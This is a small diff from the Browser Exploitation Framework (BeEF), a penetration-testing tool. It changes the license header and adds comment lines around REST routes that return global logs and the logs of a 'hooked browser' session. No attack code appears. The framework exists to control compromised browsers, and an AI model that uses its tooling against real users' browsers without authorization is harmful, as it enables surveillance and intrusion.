-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF
@@ -30,13 +20,17 @@ module BeEF
                   'Expires' => '0'
         end
 
+        #
         # @note Get all global logs
+        #
         get '/' do
           logs = BeEF::Core::Models::Log.all()
           logs_to_json(logs)
         end
 
+        #
         # @note Get hooked browser logs
+        #
         get '/:session' do
           hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
           error 401 unless hb != nil